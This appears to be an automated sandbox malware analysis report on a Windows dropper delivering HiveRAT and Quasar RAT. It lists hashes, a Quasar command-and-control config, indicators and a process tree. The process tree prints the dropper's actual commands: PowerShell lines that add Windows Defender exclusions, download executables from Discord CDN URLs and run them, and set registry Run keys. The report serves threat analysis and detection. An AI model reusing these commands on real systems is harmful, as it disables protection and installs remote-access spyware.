hiverat | 1aec33c9dc704ad71932eee6e128c9eb0908cab49d85f5a0f788484777a68a57

Analysis

max time kernel
150s
max time network
152s
platform
windows10_x64
resource
win10-en-20211014
submitted
30-10-2021 08:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d7bda4ea100c3b9b58d9a9095628c064.exe
Size

72KB
MD5

d7bda4ea100c3b9b58d9a9095628c064
SHA1

70cb92dfc7e0dd76d7db1ee2877d87be8be8b638
SHA256

1aec33c9dc704ad71932eee6e128c9eb0908cab49d85f5a0f788484777a68a57
SHA512

56b0b05499881cd07aa9efb640d89b1debe2ac3e5378057b350f91d039056799859b53ad330e83af7f79d223bb234df2e1b32a40b3becc7c295049704606f424

Score

10^/10

hiverat quasar anubisv2 aspackv2 persistence rat spyware stealer trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/894910938065547284/Cert.reg

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/894910945422368798/hivee.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/894910956184961054/BITBACKK.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/897976122757746728/dlscord.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/898608127153410129/PaladinsHackFIX.zip

Extracted

Family

quasar

Version

1.4.0

Botnet

Anubisv2

yoworldservices.space:1338

Mutex

48e1f30b-026f-45d4-b8f7-2bd40381b7db

Attributes

encryption_key
0411D8B9B23547F86733347B0634010F112E158F
install_name
dlscord.exe
log_directory
dlscordLogs
reconnect_delay
3000
startup_key
dlscord
subdirectory
dlscord

Signatures

HiveRAT
HiveRAT is an improved version of FirebirdRAT with various capabilities.
rat stealer hiverat

Quasar Payload 12 IoCs

resource	yara_rule
behavioral2/files/0x000600000001ab9e-962.dat	family_quasar
behavioral2/files/0x000600000001ab9e-968.dat	family_quasar
behavioral2/files/0x000500000001aba9-1006.dat	family_quasar
behavioral2/files/0x000500000001aba9-1004.dat	family_quasar
behavioral2/files/0x000500000001aba9-1020.dat	family_quasar
behavioral2/files/0x000500000001aba9-1034.dat	family_quasar
behavioral2/files/0x000500000001aba9-1046.dat	family_quasar
behavioral2/files/0x000500000001aba9-1058.dat	family_quasar
behavioral2/files/0x000500000001aba9-1070.dat	family_quasar
behavioral2/files/0x000500000001aba9-1082.dat	family_quasar
behavioral2/files/0x000500000001aba9-1094.dat	family_quasar
behavioral2/files/0x000500000001aba9-1104.dat	family_quasar

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

HiveRAT Payload 2 IoCs

resource	yara_rule
behavioral2/memory/364-875-0x000000000044CB2E-mapping.dmp	family_hiverat
behavioral2/memory/364-917-0x0000000000400000-0x0000000000454000-memory.dmp	family_hiverat

ASPack v2.12-2.42 2 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral2/files/0x000500000001aba2-937.dat	aspack_v212_v242
behavioral2/files/0x000500000001aba2-936.dat	aspack_v212_v242

Blocklisted process makes network request 5 IoCs

flow	pid	Process
22	3572	powershell.exe
24	920	powershell.exe
25	2152	powershell.exe
26	3832	powershell.exe
27	1044	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 14 IoCs

pid	Process
2320	hivee.exe
364	hivee.exe
1020	BITBACKK.exe
3136	tbPLVy.exe
1780	dlscord.exe
600	dlscord.exe
1104	dlscord.exe
2412	dlscord.exe
3708	dlscord.exe
2404	dlscord.exe
3592	dlscord.exe
3896	dlscord.exe
3312	dlscord.exe
1468	dlscord.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000600000001ab9d-925.dat	upx
behavioral2/files/0x000600000001ab9d-933.dat	upx

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Avast Essentials = "C:\\Users\\Admin\\AppData\\Roaming\\Avast.exe"	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\spotiify = "C:\\Users\\Admin\\AppData\\Local\\spotiify\\spotiify.exe耀"	BITBACKK.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\spotiify = "C:\\Users\\Admin\\AppData\\Local\\spotiify\\spotiify.exe"	BITBACKK.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	WScript.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
1020	BITBACKK.exe
1020	BITBACKK.exe
1020	BITBACKK.exe
1020	BITBACKK.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2320 set thread context of 364	2320	hivee.exe	86

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\jhat.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\bin\javaw.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe	tbPLVy.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\PilotshubApp.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.71\GoogleUpdateSetup.exe	tbPLVy.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Calculator.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\bin\pack200.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\klist.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DWTRIG20.EXE	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\filecompare.exe	tbPLVy.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\XboxIdp.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\pack200.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\bin\javacpl.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\bin\ssvagent.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Mozilla Firefox\updater.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\java-rmi.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\jabswitch.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\eqnedt32.exe	tbPLVy.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_x64__8wekyb3d8bbwe\OneConnect.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\jcmd.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\javah.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\serialver.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOICONS.EXE	tbPLVy.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\onenoteim.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\89.0.4389.114\chrome_installer.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\jps.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\servertool.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE	tbPLVy.exe
File opened for modification	C:\Program Files\Mozilla Firefox\plugin-hang-ui.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpEng.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe	tbPLVy.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Builder3D.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX45.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ORGCHART.EXE	tbPLVy.exe
File opened for modification	C:\Program Files\Windows Mail\wab.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\jstack.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\wsgen.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\bin\orbd.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\bin\rmid.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\ssvagent.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe	tbPLVy.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\AppxClickHandler.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\javap.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\jmc.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Client\AppVLP.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection64.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\protocolhandler.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE	tbPLVy.exe
File opened for modification	C:\Program Files\Windows Defender\MSASCuiL.exe	tbPLVy.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\WindowsCamera.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe	tbPLVy.exe
File opened for modification	C:\Program Files\7-Zip\7z.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSOUC.EXE	tbPLVy.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_1.0.45.0_x64__8wekyb3d8bbwe\PurchaseApp.exe	tbPLVy.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp.exe	tbPLVy.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Video.UI.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\chrome.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\servertool.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\misc.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\officeappguardwin32.exe	tbPLVy.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 10 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
760	schtasks.exe
1256	schtasks.exe
3668	schtasks.exe
3264	schtasks.exe
1468	schtasks.exe
3188	schtasks.exe
3288	schtasks.exe
3688	schtasks.exe
3184	schtasks.exe
3052	schtasks.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings	explorer.exe

Runs .reg file with regedit 1 IoCs

pid	Process
2928	regedit.exe

Runs ping.exe 1 TTPs 9 IoCs

Remote System Discovery

T1018

pid	Process
3192	PING.EXE
1576	PING.EXE
3940	PING.EXE
1028	PING.EXE
1220	PING.EXE
1940	PING.EXE
3304	PING.EXE
2600	PING.EXE
2964	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1460	powershell.exe
3152	powershell.exe
1460	powershell.exe
3152	powershell.exe
3152	powershell.exe
1460	powershell.exe
3368	powershell.exe
3368	powershell.exe
3368	powershell.exe
3572	powershell.exe
3572	powershell.exe
3572	powershell.exe
920	powershell.exe
920	powershell.exe
920	powershell.exe
2152	powershell.exe
2152	powershell.exe
2152	powershell.exe
3832	powershell.exe
3832	powershell.exe
3832	powershell.exe
1044	powershell.exe
1044	powershell.exe
1044	powershell.exe
1780	powershell.exe
1780	powershell.exe
1780	powershell.exe
1772	powershell.exe
1772	powershell.exe
1772	powershell.exe
2264	powershell.exe
2264	powershell.exe
2264	powershell.exe
364	hivee.exe
364	hivee.exe
364	hivee.exe
364	hivee.exe
2860	powershell.exe
2860	powershell.exe
364	hivee.exe
364	hivee.exe
2860	powershell.exe
364	hivee.exe
364	hivee.exe
364	hivee.exe
364	hivee.exe
2032	powershell.exe
2032	powershell.exe
364	hivee.exe
364	hivee.exe
2032	powershell.exe
364	hivee.exe
364	hivee.exe
364	hivee.exe
364	hivee.exe
364	hivee.exe
364	hivee.exe
364	hivee.exe
364	hivee.exe
364	hivee.exe
364	hivee.exe
364	hivee.exe
364	hivee.exe
364	hivee.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
364	hivee.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

description	pid	Process
Token: SeDebugPrivilege	1460	powershell.exe
Token: SeDebugPrivilege	3152	powershell.exe
Token: SeDebugPrivilege	3368	powershell.exe
Token: SeDebugPrivilege	3572	powershell.exe
Token: SeDebugPrivilege	920	powershell.exe
Token: SeDebugPrivilege	2152	powershell.exe
Token: SeDebugPrivilege	3832	powershell.exe
Token: SeDebugPrivilege	1044	powershell.exe
Token: SeDebugPrivilege	1780	powershell.exe
Token: SeDebugPrivilege	1772	powershell.exe
Token: SeDebugPrivilege	2320	hivee.exe
Token: SeDebugPrivilege	2264	powershell.exe
Token: SeDebugPrivilege	364	hivee.exe
Token: SeDebugPrivilege	2860	powershell.exe
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeShutdownPrivilege	1020	BITBACKK.exe
Token: SeDebugPrivilege	1780	dlscord.exe
Token: SeDebugPrivilege	600	dlscord.exe
Token: SeDebugPrivilege	1104	dlscord.exe
Token: SeDebugPrivilege	2412	dlscord.exe
Token: SeDebugPrivilege	3708	dlscord.exe
Token: SeDebugPrivilege	2404	dlscord.exe
Token: SeDebugPrivilege	3592	dlscord.exe
Token: SeDebugPrivilege	3896	dlscord.exe
Token: SeDebugPrivilege	3312	dlscord.exe
Token: SeDebugPrivilege	1468	dlscord.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1020	BITBACKK.exe
1020	BITBACKK.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2800 wrote to memory of 2804	2800	d7bda4ea100c3b9b58d9a9095628c064.exe	68
PID 2800 wrote to memory of 2804	2800	d7bda4ea100c3b9b58d9a9095628c064.exe	68
PID 2800 wrote to memory of 2804	2800	d7bda4ea100c3b9b58d9a9095628c064.exe	68
PID 2800 wrote to memory of 2828	2800	d7bda4ea100c3b9b58d9a9095628c064.exe	69
PID 2800 wrote to memory of 2828	2800	d7bda4ea100c3b9b58d9a9095628c064.exe	69
PID 2800 wrote to memory of 2828	2800	d7bda4ea100c3b9b58d9a9095628c064.exe	69
PID 2828 wrote to memory of 3152	2828	cmd.exe	72
PID 2828 wrote to memory of 3152	2828	cmd.exe	72
PID 2828 wrote to memory of 3152	2828	cmd.exe	72
PID 2804 wrote to memory of 1460	2804	cmd.exe	73
PID 2804 wrote to memory of 1460	2804	cmd.exe	73
PID 2804 wrote to memory of 1460	2804	cmd.exe	73
PID 2828 wrote to memory of 3368	2828	cmd.exe	74
PID 2828 wrote to memory of 3368	2828	cmd.exe	74
PID 2828 wrote to memory of 3368	2828	cmd.exe	74
PID 2828 wrote to memory of 3572	2828	cmd.exe	75
PID 2828 wrote to memory of 3572	2828	cmd.exe	75
PID 2828 wrote to memory of 3572	2828	cmd.exe	75
PID 2828 wrote to memory of 920	2828	cmd.exe	77
PID 2828 wrote to memory of 920	2828	cmd.exe	77
PID 2828 wrote to memory of 920	2828	cmd.exe	77
PID 2828 wrote to memory of 2152	2828	cmd.exe	78
PID 2828 wrote to memory of 2152	2828	cmd.exe	78
PID 2828 wrote to memory of 2152	2828	cmd.exe	78
PID 2828 wrote to memory of 3832	2828	cmd.exe	79
PID 2828 wrote to memory of 3832	2828	cmd.exe	79
PID 2828 wrote to memory of 3832	2828	cmd.exe	79
PID 2828 wrote to memory of 1044	2828	cmd.exe	80
PID 2828 wrote to memory of 1044	2828	cmd.exe	80
PID 2828 wrote to memory of 1044	2828	cmd.exe	80
PID 2828 wrote to memory of 1780	2828	cmd.exe	81
PID 2828 wrote to memory of 1780	2828	cmd.exe	81
PID 2828 wrote to memory of 1780	2828	cmd.exe	81
PID 1780 wrote to memory of 2928	1780	powershell.exe	82
PID 1780 wrote to memory of 2928	1780	powershell.exe	82
PID 1780 wrote to memory of 2928	1780	powershell.exe	82
PID 2828 wrote to memory of 1772	2828	cmd.exe	83
PID 2828 wrote to memory of 1772	2828	cmd.exe	83
PID 2828 wrote to memory of 1772	2828	cmd.exe	83
PID 1772 wrote to memory of 2320	1772	powershell.exe	84
PID 1772 wrote to memory of 2320	1772	powershell.exe	84
PID 1772 wrote to memory of 2320	1772	powershell.exe	84
PID 2828 wrote to memory of 2264	2828	cmd.exe	85
PID 2828 wrote to memory of 2264	2828	cmd.exe	85
PID 2828 wrote to memory of 2264	2828	cmd.exe	85
PID 2320 wrote to memory of 364	2320	hivee.exe	86
PID 2320 wrote to memory of 364	2320	hivee.exe	86
PID 2320 wrote to memory of 364	2320	hivee.exe	86
PID 2320 wrote to memory of 364	2320	hivee.exe	86
PID 2320 wrote to memory of 364	2320	hivee.exe	86
PID 2320 wrote to memory of 364	2320	hivee.exe	86
PID 2320 wrote to memory of 364	2320	hivee.exe	86
PID 2320 wrote to memory of 364	2320	hivee.exe	86
PID 2320 wrote to memory of 364	2320	hivee.exe	86
PID 364 wrote to memory of 1712	364	hivee.exe	87
PID 364 wrote to memory of 1712	364	hivee.exe	87
PID 364 wrote to memory of 1712	364	hivee.exe	87
PID 2156 wrote to memory of 3204	2156	explorer.exe	89
PID 2156 wrote to memory of 3204	2156	explorer.exe	89
PID 2264 wrote to memory of 1020	2264	powershell.exe	90
PID 2264 wrote to memory of 1020	2264	powershell.exe	90
PID 2264 wrote to memory of 1020	2264	powershell.exe	90
PID 1020 wrote to memory of 3136	1020	BITBACKK.exe	91
PID 1020 wrote to memory of 3136	1020	BITBACKK.exe	91

C:\Users\Admin\AppData\Local\Temp\d7bda4ea100c3b9b58d9a9095628c064.exe
"C:\Users\Admin\AppData\Local\Temp\d7bda4ea100c3b9b58d9a9095628c064.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2800
- C:\Windows\SysWOW64\cmd.exe
  cmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Extracting Files, Please Wait..','Error','OK','Error')"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2804
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Extracting Files, Please Wait..','Error','OK','Error')"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1460
- C:\Windows\SysWOW64\cmd.exe
  cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910938065547284/Cert.reg', (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910945422368798/hivee.exe', (Join-Path -Path $env:AppData -ChildPath 'hivee.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910956184961054/BITBACKK.exe', (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/897976122757746728/dlscord.exe', (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/898608127153410129/PaladinsHackFIX.zip', (Join-Path -Path ($pwd).path -ChildPath 'PaladinsHackFIX.zip'))" & powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'hivee.exe')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe')" & powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'PaladinsHackFIX.zip')" & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2828
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3152
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3368
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910938065547284/Cert.reg', (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg'))"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3572
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910945422368798/hivee.exe', (Join-Path -Path $env:AppData -ChildPath 'hivee.exe'))"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:920
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910956184961054/BITBACKK.exe', (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe'))"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2152
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/897976122757746728/dlscord.exe', (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe'))"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3832
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/898608127153410129/PaladinsHackFIX.zip', (Join-Path -Path ($pwd).path -ChildPath 'PaladinsHackFIX.zip'))"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1044
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg')"
    3⤵
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1780
  - - C:\Windows\SysWOW64\regedit.exe
      "regedit.exe" "C:\Users\Admin\AppData\Local\Temp\Cert.reg"
      4⤵
      Adds Run key to start application
      Runs .reg file with regedit
      PID:2928
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'hivee.exe')"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1772
  - - C:\Users\Admin\AppData\Roaming\hivee.exe
      "C:\Users\Admin\AppData\Roaming\hivee.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2320
    - - C:\Users\Admin\AppData\Roaming\hivee.exe
        
        "C:\Users\Admin\AppData\Roaming\hivee.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:364
      - C:\Windows\SysWOW64\explorer.exe
        
        "C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Local\Execution.vbs
        6⤵
        
        PID:1712
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe')"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2264
  - - C:\Users\Admin\AppData\Roaming\BITBACKK.exe
      "C:\Users\Admin\AppData\Roaming\BITBACKK.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1020
    - - C:\Users\Admin\AppData\Local\Temp\tbPLVy.exe
        
        C:\Users\Admin\AppData\Local\Temp\tbPLVy.exe
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:3136
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\56b759b8.bat" "
        6⤵
        
        PID:1772
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe')"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2860
  - - C:\Users\Admin\AppData\Roaming\dlscord.exe
      "C:\Users\Admin\AppData\Roaming\dlscord.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1780
